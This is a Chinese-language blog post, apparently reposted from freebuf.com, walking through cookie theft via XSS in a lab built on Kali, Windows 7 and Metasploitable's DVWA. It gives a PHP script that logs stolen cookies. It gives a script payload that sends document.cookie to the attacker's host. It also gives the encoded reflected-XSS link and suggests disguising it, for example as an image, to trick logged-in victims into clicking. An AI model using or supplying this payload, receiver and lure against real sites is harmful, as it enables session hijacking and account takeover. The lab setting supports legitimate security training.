利用XSS漏洞获取对方cookie(测试通过20190908) – 作者:Rname红名

       在网上找到很多关于利用XSS漏洞获取对方cookie的文章,总结归纳并咨询了研发人员,编制了一个简单的cookie接收脚本,简单有效,测试通过。

(1)环境搭建

kali linux:192.168.80.136

目标win7: 192.168.80.130

Metasploitable:192.168.80.129

cookie接收脚本get.php(脚本在/var/www/html文件夹下,html文件夹权限777):

<?php
$ck =$_GET['cookie'];
error_log("$ck\n",3,"cookie.txt");
?>

       (2)XSS漏洞利用

       目标登录metasploitable的DVWA,点击存在XSS漏洞的页面,输入如下代码后提交:<script>newImage().src="http://192.168.80.136/get.php?cookie="+document.cookie;</script>

20190908-230657.png

(3)查看cookie

       切换到kali,直接查看cookie.txt内容,可以看到获得的cookie。

20190908-230649.png(4)进一步利用

       目标提交后可以在地址栏看到如下URL:

http://192.168.80.129/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2F192.168.80.136%2Fget.php%3Fcookie%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E#

       可以将以上URL伪装成其他形式(如图片),诱使目标点击,在目标已登录的情况下,可以达到同样获取cookie的效果。

来源:freebuf.com 2019-09-08 23:14:20 by: Rname红名

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论